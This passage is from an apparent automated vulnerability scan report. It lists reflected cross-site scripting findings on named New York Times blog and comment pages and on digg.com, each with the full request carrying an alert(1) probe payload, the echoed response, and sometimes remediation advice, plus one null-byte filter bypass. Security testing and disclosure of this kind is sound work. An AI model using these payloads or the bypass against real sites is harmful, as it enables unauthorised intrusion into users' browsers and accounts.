Date: Sat, 13 Nov 2010 02:01:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33545

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>The Wee
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com37048"><a>fe7fd4940f8/yr/mo/day/the-week-in-culture-pictures-nov-12/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Botto
...[SNIP]...

3.116. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7977"-alert(1)-"f6aef8543a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/?c7977"-alert(1)-"f6aef8543a1=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70362

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>The Wee
...[SNIP]...
= "nytimesglobal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_143071";
var s_pagename = "2010/11/12/the-week-in-culture-pictures-nov-12/?c7977"-alert(1)-"f6aef8543a1=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.117. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef09a"><a>6c6cf61beb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsef09a"><a>6c6cf61beb1/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 114608

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>A Defic
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsef09a"><a>6c6cf61beb1/opinionator.blogs.nytimes.com/yr/mo/day/a-deficit-of-respect/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom
...[SNIP]...

3.118. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dd94'-alert(1)-'3641936aba3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments2dd94'-alert(1)-'3641936aba3/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 114345

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>A Defic
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments2dd94'-alert(1)-'3641936aba3';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.119. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53310"><a>4fd6753484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/opinionator.blogs.nytimes.com53310"><a>4fd6753484/2010/11/12/a-deficit-of-respect/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 32847

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>A Defic
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/opinionator.blogs.nytimes.com53310"><a>4fd6753484/yr/mo/day/a-deficit-of-respect/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bottom9,Inv1,Inv2,In
...[SNIP]...

3.120. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66476"-alert(1)-"d2cc1166fce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/?66476"-alert(1)-"d2cc1166fce=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 104936

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>A Defic
...[SNIP]...
r s_account = "nytimesglobal,nytopinionator";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "289_69231";
var s_pagename = "2010/11/12/a-deficit-of-respect/?66476"-alert(1)-"d2cc1166fce=1";
var s_channel = "opinionator";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.121. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cd9c'-alert(1)-'4a279ffe4c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments8cd9c'-alert(1)-'4a279ffe4c1/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 78663

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Reviewi
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments8cd9c'-alert(1)-'4a279ffe4c1';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.122. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a623d"><a>3466d5f58ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsa623d"><a>3466d5f58ee/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 78729

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Reviewi
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsa623d"><a>3466d5f58ee/wheels.blogs.nytimes.com/yr/mo/day/reviewing-the-2011-aston-martin-v-12-vantage/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,S
...[SNIP]...

3.123. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47de7"><a>818b9e1e4e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/wheels.blogs.nytimes.com47de7"><a>818b9e1e4e0/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33885

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Reviewi
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/wheels.blogs.nytimes.com47de7"><a>818b9e1e4e0/yr/mo/day/reviewing-the-2011-aston-martin-v-12-vantage/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bott
...[SNIP]...

3.124. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a953"-alert(1)-"fd6c09b8e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/?7a953"-alert(1)-"fd6c09b8e6d=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 74294

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Reviewi
...[SNIP]...
imesglobal,nytwheels";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "29_75697";
var s_pagename = "2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/?7a953"-alert(1)-"fd6c09b8e6d=1";
var s_channel = "wheels";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.125. http://dealbook.nytimes.com/2010/11/12/the-acquisition-of-tina-brown/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2010/11/12/the-acquisition-of-tina-brown/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9cd7"><script>alert(1)</script>bd807b33336 was submitted in the src parameter. This input was echoed as c9cd7\"><script>alert(1)</script>bd807b33336 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/the-acquisition-of-tina-brown/?src=twrc9cd7"><script>alert(1)</script>bd807b33336 HTTP/1.1
Host: dealbook.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
+Kravis+Roberts;Stephen+Schwarzman;Stephen+A.+Schwarzman;Steve+Schwarzman;Blackstone+Group;barry-diller;iacinteractivecorp;media;newsweek;sidney-harman;the-daily-beast;tina-brown;top-headline-2&src=twrc9cd7\"><script>alert(1)</script>bd807b33336">
...[SNIP]...

3.126. http://digg.com/remote-submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /remote-submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b3e90"><script>alert(1)</script>9fa78c401ad was submitted in the REST URL parameter 1. This input was echoed as b3e90"><script>alert(1)</script>9fa78c401ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /remote-submit%00b3e90"><script>alert(1)</script>9fa78c401ad HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1943021764233658561%3A135; expires=Mon, 13-Dec-2010 02:02:25 GMT; path=/; domain=digg.com
Set-Cookie: d=aa91bb711c6bbb8366e494de8d7a0a35ee8a25c84136f625861f0473a8a6194c; expires=Thu, 12-Nov-2020 12:10:05 GMT; path=/; domain=.digg.com
X-Digg-Time: D=277115 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15225

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/remote-submit%00b3e90"><script>alert(1)</script>9fa78c401ad.rss">
...[SNIP]...

3.127. http://dinersjournal.blogs.nytimes.com/2010/11/12/using-root-vegetables-raw/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dinersjournal.blogs.nytimes.com
Path:   /2010/11/12/using-root-vegetables-raw/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0f91"><script>alert(1)</script>f1e4b0bb863 was submitted in the src parameter. This input was echoed as f0f91\"><script>alert(1)</script>f1e4b0bb863 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/using-root-vegetables-raw/?src=twrf0f91"><script>alert(1)</script>f1e4b0bb863 HTTP/1.1
Host: dinersjournal.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dinersjournal.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
eviews;Cooking;Eating;Wine;Restaurants;Recipes;Dining;Sifton;Bittman;Asimov;New+York;Bruni;The+New+York+Times;beets;brussels-sprouts;butternut-squash;cooking;general;home-cooking;the-minimalist&src=twrf0f91\"><script>alert(1)</script>f1e4b0bb863">
...[SNIP]...

3.128. http://economix.blogs.nytimes.com/2010/11/12/a-high-water-mark-for-profits/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://economix.blogs.nytimes.com
Path:   /2010/11/12/a-high-water-mark-for-profits/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce27"><script>alert(1)</script>67611b927bc was submitted in the src parameter. This input was echoed as 3ce27\"><script>alert(1)</script>67611b927bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/a-high-water-mark-for-profits/?src=twr3ce27"><script>alert(1)</script>67611b927bc HTTP/1.1
Host: economix.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://economix.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
MNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Economics;Economy;Economics+Policy;Economics+Reports;Business;corporate-profits;forecasts;joseph-a-lavorgna;unemployment&src=twr3ce27\"><script>alert(1)</script>67611b927bc">
...[SNIP]...

3.129. http://frugaltraveler.blogs.nytimes.com/2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frugaltraveler.blogs.nytimes.com
Path:   /2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df23"><script>alert(1)</script>267493e97ac was submitted in the src parameter. This input was echoed as 6df23\"><script>alert(1)</script>267493e97ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/?src=mv6df23"><script>alert(1)</script>267493e97ac&ref=travel HTTP/1.1
Host: frugaltraveler.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice;jetblue&src=mv6df23\"><script>alert(1)</script>267493e97ac">
...[SNIP]...

3.130. http://frugaltraveler.blogs.nytimes.com/2010/11/02/a-guide-to-the-caribbean-on-a-budget/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frugaltraveler.blogs.nytimes.com
Path:   /2010/11/02/a-guide-to-the-caribbean-on-a-budget/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99fa0"><script>alert(1)</script>3ce9920fcd7 was submitted in the src parameter. This input was echoed as 99fa0\"><script>alert(1)</script>3ce9920fcd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/02/a-guide-to-the-caribbean-on-a-budget/?src=me99fa0"><script>alert(1)</script>3ce9920fcd7&ref=travel HTTP/1.1
Host: frugaltraveler.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice&src=me99fa0\"><script>alert(1)</script>3ce9920fcd7">
...[SNIP]...

3.131. http://frugaltraveler.blogs.nytimes.com/2010/11/10/biking-los-angeles/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frugaltraveler.blogs.nytimes.com
Path:   /2010/11/10/biking-los-angeles/

Issue detail

